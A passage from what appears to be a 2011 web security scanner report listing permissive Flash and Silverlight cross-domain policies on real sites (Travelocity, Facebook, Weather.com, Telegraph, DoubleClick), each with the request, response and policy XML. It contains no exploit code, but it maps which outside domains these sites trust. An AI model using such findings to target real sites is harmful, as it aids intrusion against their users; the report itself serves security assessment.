   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.76. http://travel.travelocity.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: travel.travelocity.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:30:05 GMT
Server: Apache
Last-Modified: Thu, 07 Apr 2011 16:03:28 GMT
ETag: "14376-6a3-3ffcb400"
Accept-Ranges: bytes
Content-Length: 1699
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
    SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.travelocity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.travelocity.com"    secure="false" />
...[SNIP]...
<allow-access-from domain="i.travelocity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.travelpn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="i.travelpn.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="i.travelocity.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="travelocityf.download.akamai.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="ag.travelocity.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="hg.travelocity.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="design.int.travelocity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="ad.*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dotomi.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sabre.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ach.travel.yahoo.net" secure="false" />
...[SNIP]...
<allow-access-from domain="travelrewardspn.capitalone.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.travelocity.com" secure="true" />
...[SNIP]...
<allow-access-from domain="a248.e.akamai.net" secure="true" />
...[SNIP]...
<allow-access-from domain="fr.travelocity.ca" secure="false" />
...[SNIP]...

6.77. http://travel.usatoday.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://travel.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: travel.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 25 Jan 2011 15:11:34 GMT
Accept-Ranges: bytes
ETag: "226a727a2bccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:34 GMT
Connection: close
Content-Length: 1507

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...

6.78. http://webassets.scea.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webassets.scea.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: webassets.scea.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Date: Sun, 15 May 2011 20:27:01 GMT
Content-Length: 4479
Content-Type: text/xml
ETag: "1ce49f2-117f-49aeb16104640"
Expires: Sun, 15 May 2011 15:50:32 GMT
Last-Modified: Fri, 28 Jan 2011 17:06:25 GMT
Accept-Ranges: bytes
Server: Level-3 Origin Storage/1.5
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<allow-access-from domain="*.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secureus.playstation.com"/>

<allow-access-from domain="fp.scea.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp-stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="repl.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp-repl.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.local.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="local.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa.stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa-fp-repl.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa-fp-stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage.rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="repl.rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa.rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="qa.stage.rae.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="sp-int.beta.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.sp-int.beta.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta.myresistance.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.www.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="sp-int.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.sp-int.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta33.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta43.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="beta45.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta33.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta43.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.beta45.socom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.littlebigworkshop.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.littlebigworkshop.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fp.www.littlebigworkshop.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="stagea.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="proda.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodb.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="204.232.191.161" secure="false"/>
...[SNIP]...
<allow-access-from domain="204.232.191.162" secure="false"/>
...[SNIP]...
<allow-access-from domain="204.232.191.175" secure="false"/>
...[SNIP]...
<allow-access-from domain="204.232.159.215" secure="false"/>
...[SNIP]...
<allow-access-from domain="173.203.129.45" secure="false"/>
...[SNIP]...
<allow-access-from domain="playstation.stage.lithium.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="boardsus-stage.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="boardsus.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="gap.opencirclecorp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="rls.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ogs.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="np.us.playstation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage-webassets.scea.com" secure="false"/>
...[SNIP]...

6.79. http://wow.weather.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wow.weather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: wow.weather.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:52 GMT
Server: Apache
SVRNAME: web2x01
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2057
Keep-Alive: timeout=1, max=7463
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.weather.com" />
<allow-access-from domain="*.epicmashup.com" />
<allow-access-from domain="showcase.weather.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.imwx.com" />
<allow-access-from domain="*.rga.com" />
<allow-access-from domain="*.jnj.com" />

<allow-access-from domain="*.zyrtec.com" />
<allow-access-from domain="*.amazonaws.com" />
<allow-access-from domain="*.gigyahosting.com" />
<allow-access-from domain="*.gigyahosting1.com" />
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="adportal.pointroll.com" />
<allow-access-from domain="*.ge.com" />
<allow-access-from domain="*.inbcu.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="*.ivillage.com" />
<allow-access-from domain="devworks.ivillage.com" />
<allow-access-from domain="devi.ivillage.com" />
<allow-access-from domain="i.ivillage.com" />
<allow-access-from domain="www.ivillage.com" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.tvpdigital.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="apps.eyewonderlabs.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="fjpecvaa.joyent.us" />
<allow-access-from domain="widget.bravotv.com" />
<allow-access-from domain="*.jwtdev.com" />
<allow-access-from domain="*.jwtweb.com" />
<allow-access-from domain="*.na.jnj.com" />
<allow-access-from domain="*2mdn.net" />
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...

6.80. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.99.38
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.81. http://www.fingerhut.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fingerhut.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fingerhut.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 21 Sep 2010 21:58:02 GMT
Accept-Ranges: bytes
Content-Length: 430
Content-Type: text/xml
X-N: S
Date: Mon, 16 May 2011 01:32:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="convertlanguage.com"/>
   <allow-access-from domain="*.convertlanguage.com"/>
   <allow-access-from domain="fingerhut.com"/>
   <allow-access-from domain="*.fingerhut.com"/>
...[SNIP]...

6.82. https://www.fingerhut.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.fingerhut.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fingerhut.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 21 Sep 2010 21:58:02 GMT
Accept-Ranges: bytes
Content-Length: 430
Content-Type: text/xml
X-N: S
Date: Mon, 16 May 2011 01:37:29 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="convertlanguage.com"/>
   <allow-access-from domain="*.convertlanguage.com"/>
   <allow-access-from domain="fingerhut.com"/>
   <allow-access-from domain="*.fingerhut.com"/>
...[SNIP]...

6.83. http://www.mcafeesecure.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mcafeesecure.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mcafeesecure.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
Cache-Control: private
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 01:38:53 GMT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.84. https://www.mcafeesecure.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.mcafeesecure.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mcafeesecure.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
Cache-Control: private
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 01:37:35 GMT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.85. http://www.telegraph.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.telegraph.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.telegraph.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
ETag: W/"1150-1304607406000"
Last-Modified: Thu, 05 May 2011 14:56:46 GMT
Content-Length: 1150
Content-Type: application/xml
Date: Mon, 16 May 2011 01:19:33 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="telegraph.co.uk"/>
<allow-access-from domain="*.telegraph.co.uk"/>
<allow-access-from domain="telegraphquiz.cfmx.flarecreative.com"/>
<allow-access-from domain="213.187.32.58"/>
<allow-access-from domain="213.187.48.185"/>
<allow-access-from domain="tgquiz.pavo.flarecreative.com"/>
<allow-access-from domain="ad.uk.doubleclick.net"/>
<allow-access-from domain="st.sand.msn-int.com" secure="true"/>
<allow-access-from domain="*.msn.com" secure="true"/>
<allow-access-from domain="services.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.videoegg.com"/>
<allow-access-from domain="*.bebo.com"/>
<allow-access-from domain="*.hi5.com"/>
<allow-access-from domain="*.wayn.com"/>
<allow-access-from domain="*.tagged.com"/>
<allow-access-from domain="*.ringo.com"/>
<allow-access-from domain="dailytelegraph.accuweather.com"/>
<allow-access-from domain="skin.issuu.com" />
<allow-access-from domain="static.issuu.com" />
<allow-access-from domain="bestbuys.tmg.s3.amazonaws.com" />
<allow-access-from domain="*.washingtonpost.com" />
...[SNIP]...

6.86. http://www.orbitz.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.orbitz.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 11 May 2011 17:00:39 GMT
ETag: "2b8-4a30303185bc0"
Content-Type: text/xml
Content-Length: 696
Server: Apache
Date: Mon, 16 May 2011 01:29:50 GMT
Age: 13611
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

<cross-domain-policy>
   <allow-access-from domain="media.pointroll.com"/>
   <allow-access-from domain="www.pointroll.com"/>
   <allow-access-from domain="submit.pointroll.com"/>
   <allow-access-from domain="data.pointroll.com"/>
   <allow-access-from domain="speed.pointroll.com"/>
   <allow-access-from domain="mirror.pointroll.com"/>
   <allow-access-from domain="mx.pointroll.com"/>
   <allow-access-from domain="geo.pointroll.com"/>
   <allow-access-from domain="ll.pointroll.com"/>
   <allow-access-from domain="clk.pointroll.com"/>
   <allow-access-from domain="clients.pointroll.com"/>
   <allow-access-from domain="fdaf.pointroll.com"/>
   <allow-access-from domain="demo.pointroll.net"/>
...[SNIP]...

7. Silverlight cross-domain policy  previous  next
There are 14 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT
Date: Mon, 16 May 2011 01:19:40 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...